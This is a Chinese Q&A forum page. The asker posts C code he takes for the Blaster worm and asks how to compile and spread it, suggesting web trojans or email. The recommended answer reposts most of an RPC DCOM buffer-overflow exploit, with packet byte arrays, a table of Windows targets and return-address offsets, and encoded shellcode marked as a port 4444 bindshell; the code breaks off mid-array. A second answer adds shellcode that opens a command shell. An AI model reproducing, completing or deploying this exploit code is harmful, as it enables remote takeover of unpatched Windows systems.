• 所有问题

    • 谁帮我分析(注释)下冲击波源代码。。注明个段代码的功能。它是用什么语言写的?我有C、C#编程基础)

    **************************************************************/
    #include <stdio.h>
    #include <stdlib.h>
    #include <error.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <fcntl.h>
    #include <unistd.h>

    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,
    };
    代码不完整,请见http://www.pcdog.com/network/security/2005/11/c044477.html
    假如要执行这段代码的话要如何执行(说明完整点)??是先编译,然后怎么运行?通过嵌入网页木马??电子邮件发送???

    举报该问题
    推荐答案   2007-10-11
    #i nclude

    #i nclude

    #i nclude

    #i nclude

    #i nclude

    #i nclude

    #i nclude

    #i nclude

    #i nclude

    #i nclude

    #i nclude

    unsigned char bindstr[]={

    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,

    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={

    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={

    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={

    0x5C,0x00

    ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

    unsigned char *targets [] =

    {

    "Windows NT SP4 (english)",

    "Windows NT SP5 (chineese)",

    "Windows NT SP6 (chineese)",

    "Windows NT SP6a (chineese)",

    "Windows 2000 NOSP (polish)",

    "Windows 2000 SP3 (polish)",

    "Windows 2000 SP4 (spanish)",

    "Windows 2000 NOSP1 (english)",

    "Windows 2000 NOSP2 (english)",

    "Windows 2000 SP2-1 (english)",

    "Windows 2000 SP2-2 (english)",

    "Windows 2000 SP3-2 (english)",

    "Windows 2000 NOSP (chineese)",

    "Windows 2000 SP1 (chineese)",

    "Windows 2000 SP2 (chineese)",

    "Windows 2000 SP3 (chineese)",

    "Windows 2000 SP4 (chineese)",

    "Windows 2000 SP3 (german)",

    "Windows 2000 NOSP (japaneese",

    "Windows 2000 SP1 (japaneese)",

    "Windows 2000 SP2 (japaneese)",

    "Windows 2000 NOSP (korean)",

    "Windows 2000 SP1 (korean)",

    "Windows 2000 SP2 (korean)",

    "Windows 2000 NOSP (mexican)",

    "Windows 2000 SP1 (mexican)",

    "Windows XP NOSP (english)",

    "Windows SP1-2 (english)",

    "Windows 2k3 (english)",

    "Windows 2000 SP3 (german)",

    "Windows 2000 SP4-1 (german)",

    "Windows 2000 SP4-2 (german)",

    "Windows XP SP1 (german)",

    "Windows 2000 SERVER SP1 (french)",

    "Windows 2000 SERVER SP4 (french)",

    "Windows XP NOSP (french)",

    "Windows XP SP1 (french)",

    "Windows 2000 SP0 (english)",

    "Windows 2000 SP1 (english)",

    "Windows 2000 SP2 (english)",

    "Windows 2000 SP3 (english)",

    "Windows 2000 SP4 (english)",

    "Windows XP SP0 (english)",

    "Windows XP SP1-1 (english)",

    "Windows XP SP2 (english)",

    "Windows 2000 Advanced Server SP3 (english)",

    "ALL/WINXP/WIN2K",

    NULL

    };

    unsigned long offsets [] =

    {

    0x77e527f3,

    0x77cfdaee,

    0x77ac0ef0,

    0x77c3eaf0,

    0x774d3fe3,

    0x77292ce4,

    0x77133ba5,

    0x777416e8,

    0x772b49e2,

    0x77b524e8,

    0x775cfa2e,

    0x772ae3e2,

    0x778b89e6,

    0x772b49e0,

    0x77444342,

    0x77294cdf,

    0x777a882e,

    0x77e527f3,

    0x778b89e5,

    0x772b49df,

    0x772ae3e1,

    0x778b89e5,

    0x772b49df,

    0x772ae3e1,

    0x778b89e8,

    0x77e3afe9,

    0x77db37d7,

    0x77b05422,

    0x77292ce3,

    0x77294ce0,

    0x7756c2e2,

    0x77fc18d4,

    0x774b3ee4,

    0x7756c2e2,

    0x774a75d4,

    0x77fc18d4,

    0x77e81674,

    0x77e829ec,

    0x77e824b5,

    0x77e8367a,

    0x77f92a9b,

    0x77e9afe3,

    0x77e626ba,

    0x77d737db,

    0x77e2afc5,

    0x010016C6

    };

    unsigned char sc[]=

    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"

    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"

    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* port 4444 bindshell */

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"

    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"

    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"

    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"

    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"

    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"

    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"

    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"

    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"

    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"

    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"

    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"

    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"

    参考资料:http://www.pcdog.com/network/security/2005/11html

    温馨提示:答案为网友推荐,仅供参考
    其他回答
    第1个回答  2007-10-04
    呵呵,这个不是冲击波的代码
    只是当年冲击波所利用的那个rpc溢出漏洞的exploit而已,楼主见过哪个蠕虫还让用户来选择目标的os种类吗?
    这个当然是用c编写的,被编码的东西叫做shellcode,是溢出后控制程序流程用的,可以理解为一些函数的代码,也就是你想让目标机器执行的指令

    楼主想编写蠕虫吧,蠕虫一般是c和汇编结合来编写,只用汇编也可以,当然嵌入式开发效率要高,要知道蠕虫和杀毒软件拼的就是时间啊 :)

    现在即使编译好了也不会有什么好的效果了,因为那个漏洞已经不是0day了,被补好了,没多大价值,现在毒客界流行arp病毒,irc-bot和p2p-bot

    再就是你给出的代码是linux下利用的,看
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <fcntl.h>
    #include <unistd.h>
    这几个头文件就知道,在linux下用gcc编译吧,当然windows下用cygwin也可以模拟gcc编译的
    第2个回答  2007-10-04
    这种代码在溢出攻击中称之为SHELLCODE,是用vc编写好攻击代码,然后按F10调试-->在DEBUG工具兰中点击最后一个按钮“DISASSEMBLE”出现原程序的汇编代码。再到代码窗口上点鼠标右建再弹出筐中选择‘CODE BYTES’就会出现上面类似的代码(实质是机器码)
    在溢出后就可以执行这种机器代码。
    unsigned char shellcode[] =
    "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
    "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
    "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
    "\x64\x9f\xE6\x77" //sp3 loadlibrary地址0x77e69f64
    "\x52\x8D\x45\xF4\x50"
    "\xFF\x55\xF0"
    "\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
    "\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
    "\x50\xB8"
    "\xc3\xaf\x01\x78" //sp3 System地址0x7801afc3
    "\xFF\xD0";这段SHELLCODE就是开DOS窗口的楼主可以尝试下!
    第3个回答  2007-10-04
    C语言编写,好像是Linux平台下编译的通用版本
    这些数组里装的是已经编译的程序的机器码,只是以十六进制的形式表示的而已,在使用时用于覆盖内存缓冲区溢出后的机器码,以使得这些指令得到执行.
    第4个回答  2007-10-04
    不用注释了吧?就是加入一些头文件,然后声明两个数组而已。
    应该是C吧。
    12
    相似回答
    c语言用什么软件编写?答:c语言可以用的软件推荐如下:1、TurboC是由美国Borland公司开发的一套C语言程序开发工具,Borland公司是一家专门从事软件开发、研制的大公司。该公司相继推出了一套Turbo系列软件,如TurboBASIC、TurboPascal、TurboProlog,这些软件很受用户欢迎。TurboC集成了程序编辑、调试、链接等多种功能。2、WIN-TC是...
    高手们帮我看看c语言程序,请给每行代码功能注释答:循环结构可以减少源程序重复书写的工作量,用来描述重复执行某段算法的问题,这是程序设计中最能发挥计算机特长的程序结构,C语言中提供四种循环,即goto循环、while循环、do ?Cwhile循环和for循环。四种循环可以用来处理同一问题,一般情况下它们可以互相代替换,但一般不提倡用goto循环,因为强制改变程序的顺序经常会给程序的...
    ...C++ ? JAVE? C#? NET? 等等 知道它是用什么语言编写的。答:图一:Java 图二:XML 图三:Java 图四:HTML5 Java语言代码可通过关键字识别,比如权限修饰符:public,protected,private。比如导入一个包:import。(这和C/C++的 #include 是不一样的。)XML:第一行<?XML>可表明其语言是XML,而且版本是1.0 HTML5:看代码第一行 <!DOCTYPE html> ,这是HT...
    C语言中所有的代码及其代表的意思,有谁知道?答:新术语 函数(function)是与主程序分开的码段,进行预定的一个服务。函数是各种编程语言的重要部分,C++也不例外。最简单的函数不带参数,返回void(表示不返回任何东西),其它函数可能带一个或几个参数并可能返回一个值。函数名规则与变量名相同。图1.5显示了函数的构成部分。新术语 参数(parameter)是...
    c语言本身是开源的吗,c语言是用什么写的?谢谢大家了答:C语言是一个由ISO组织中的ANSI制定的标准,任何个人或者组织都可以根据这个标准将其实现。现今,世界上有许多不同的C语言实现,比较著名的有:GCC、Watcom、MS C等,其中前两者是开源的,后者是闭源的。下面粘贴几个老外的回答(原回答链接)。The C language is not a piece of software but a ...
    关于C语言程序,请大虾们在每一段的代码后面帮我做个注释!我会追加分数...答:在直角坐标系下给定直线上两点,绘制直线,默认为红色,要求: ,标示出直线在不同区域的颜色,在给定区域内,直线为白色,在区域外直线为黄色 程序是这样的:include <graphics.h>//添加graphics.h头文件 const int wxl=100,wxr=400,wyb=100,wyt=300;//声明参 数,即参考区域 typedef struct//...
    大家正在搜
    宫云战源代码分析源代码盗版分析软件源代码分析技术linux源代码情景分析为什么源代码不出第二部怎么看源代码如何解析源代码网站源代码怎么看网页源代码怎么看懂
    相关问题
    谁能帮我把这段java代码 注释下 要详细点的。。
    谁能帮我注释下这段代码
    这段c语言代码谁帮我注释下
    我是菜鸟 谁能帮我把这段代码全部都加上注释 谢谢
    帮我用注释解释这段C语言代码
    帮我注释下一段js代码
    谁可以帮我详细注释下这段java代码的意思?(例如//***...
    大神,请问用psychopy的刺激生成函数可以做一个旋转的五...